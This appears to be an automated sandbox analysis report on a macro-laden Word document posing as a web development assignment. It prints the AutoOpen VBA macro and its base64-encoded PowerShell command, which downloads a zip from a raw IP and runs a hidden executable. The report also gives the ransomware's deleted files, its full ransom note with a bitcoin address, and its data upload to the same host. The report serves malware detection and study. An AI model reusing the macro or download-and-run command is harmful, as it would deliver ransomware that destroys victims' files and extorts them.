fe 05 0b 58 01 8d aa 24 af c7 b9 06 90 df 5c 2e 8f e9 1a 74 4e ae 82 e7 68 33 9e cd 63 ec bd 85 f8 5e 8e ff ac cb 63 6b 4e 8a 7a c0 f9 1f 61 e3 b2 b5 dc aa e2 8a 7b c0 55 cc 79 64 fe 6c c2 d7 10 d6 92 dc d5 9d a7 87 d7 fe bf f8 6b 2a 2d cd 14 46 04 d9 bb 30 c2 43 68 cd 29 27 95 53 56 fc 3c 86 b8 0f 46 09 1a 3e 14 57 42 31 5e 78 c1 58 38 f5 d3 18 52 5a 9d 3d e1 be 4a 81 ce 2e b8 9d 5a 9a ab b3 d1 a7 fd a5 d0 78 27 20 a5 b4 8d 13 f3 88 4c 42 8d fe b1 3b 70 51 94 65 6f b8 88 92 0b ff 50 79 f0 39 40 c8 03 24 bb 56 fe 48 2b 6f df 8a e5 94 73 67 c7 90 9a 6c 8b bf c0 dd 48 6b f6 3a 9b ea 76 e0 b8 4a 3e a0 db df 45 be c2 3b 05 e9 a5 d5 67 2f b1 f8 c7 e1 c3 5a 59 5b d3 80 b3 e9 27 2c 79 22 16 8b c9 75 9d 50 70 1f 0c b5 08 2b 22 6d 73 a1 46 18 11 20 8c 7a da cb 30 96 f2 de 3b 2e a2 ca 16 46 e4 12 52 53 e5 87 ae 1e 00 e6 ca 01 85 f5 1d 17 6a c4 ce 37 40 5d 69 1d e8 27 1b 78 55 42 5f 31 9c f2 d7 fc 3c 42 c3 83 8f b0 47 da d1 7c 9c a8 94 b2 05 8b 72 4a 7f c0 e4 ca 36 1a 4e 59 8d Data Ascii: PKYLD*
      Source: global trafficHTTP traffic detected: GET /d/assignment.zip HTTP/1.1Host: 91.208.206.195Connection: Keep-Alive
      Source: unknownHTTP traffic detected: POST /store HTTP/1.1Host: 91.208.206.195User-Agent: ureq/2.10.1Accept: */*Content-Type: application/jsonaccept-encoding: gzipContent-Length: 46
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.208.206.195
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.208.206.195/d/assignment.zip
      Source: run.exe, 00000008.00000002.1904849243.000002AD6029C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.208.206.195/store
      Source: powershell.exe, 00000004.00000002.1884072357.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: run.exe, 00000008.00000000.1882027598.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000010.00000000.2006797486.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
      Source: run.exe, 00000008.00000000.1882027598.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000010.00000000.2006797486.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://docs.rs/rustls/latest/rustls/manual/_03_howto/index.html#unexpected-eof
      Source: powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issues
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issues/home/kali/.cargo/registry/src/index.crates.io-6f17d22bba15001
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issuesCOMMAND
      Source: run.exe, 00000008.00000000.1882027598.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000010.00000000.2006797486.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issuesj
      Source: powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

      E-Banking Fraud

      barindex
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==Jump to behavior

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI.png
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile deleted: C:\Users\user\Desktop\NWTVCDUMOB.pdf
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile deleted: C:\Users\user\Desktop\BPMLNOBVSB.jpg
      Source: C:\Users\user\p4yx0rl0s3\run.exeFile dropped: C:\Users\user\p4yx0rl0s3\note.txt -> your files have been encrypted.you have 24 hours before file deletion.do not tamper with any files. do not allow anti-virus software to tamper with any files. doing so will result in loss of data and possibly make decrypting all files impossible.any files created after encryption and prior to decryption will be lost. your recovery token: 25838to recover your files, send 0.0032 bitcoin (approx. 300 usd) to this address:bc1qf3h74a9gkfxqt0f737mks0mrnzqntm3mwh8nn3bitcoin can be bought from exchanges such as coinbase, binance, kraken and more. search online about how to buy bitcoin if you do not know.send an email to c0nt4ctu5@proton.me conatining your recovery token and the bitcoin address listed above and you will receive your decryption key.Jump to dropped file

      System Summary

      barindex
      Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpen, API IWshShell3.Run("powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==")Name: AutoOpen
      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Run_1__ob = jbxthis.Run(jbxparam0)
      Source: em_webdev_assignment_dec2024.docOLE, VBA macro line: Str = Str + "powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG"
      Source: em_webdev_assignment_dec2024.docOLE, VBA macro line: CreateObject("Wscript.Shell").Run Str
      Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpen, String powershell: Str = Str + "powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG"Name: AutoOpen
      Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpen, String wscript: CreateObject("Wscript.Shell").Run StrName: AutoOpen
      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Str = Str + "powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\p4yx0rl0s3\run.exeJump to dropped file
      Source: em_webdev_assignment_dec2024.docOLE, VBA macro line: Sub AutoOpen()
      Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpenName: AutoOpen
      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Sub AutoOpen()
      Source: em_webdev_assignment_dec2024.docOLE indicator, VBA macros: true
      Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
      Source: ~WRF{93058688-27BD-47E6-B291-D8708A998DE4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: classification engineClassification label: mal100.rans.bank.expl.evad.winDOC@30/338@0/1
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{86AF9ECD-D1D1-4AD7-994E-E2D41975E4CC} - OProcSessId.datJump to behavior
      Source: em_webdev_assignment_dec2024.docOLE indicator, Word Document stream: true
      Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
      Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
      Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
      Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
      Source: ~WRD0002.tmp.0.drOLE indicator, Word Document stream: true
      Source: em_webdev_assignment_dec2024.docOLE document summary: title field not present or empty
      Source: em_webdev_assignment_dec2024.docOLE document summary: author field not present or empty
      Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRD0000.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{93058688-27BD-47E6-B291-D8708A998DE4}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{93058688-27BD-47E6-B291-D8708A998DE4}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{93058688-27BD-47E6-B291-D8708A998DE4}.tmp.0.drOLE document summary: edited time not present or 0
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpMemory string: rustls::msgs::handshake
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpMemory string: rustls::msgs::handshakeClientExtension
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: em_webdev_assignment_dec2024.docReversingLabs: Detection: 50%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\p4yx0rl0s3\run.exe "C:\Users\user\p4yx0rl0s3\run.exe"
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: unknownProcess created: C:\Users\user\p4yx0rl0s3\run.exe "C:\Users\user\p4yx0rl0s3\run.exe"
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: unknownProcess created: C:\Users\user\p4yx0rl0s3\run.exe "C:\Users\user\p4yx0rl0s3\run.exe"
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\p4yx0rl0s3\run.exe "C:\Users\user\p4yx0rl0s3\run.exe" Jump to behavior
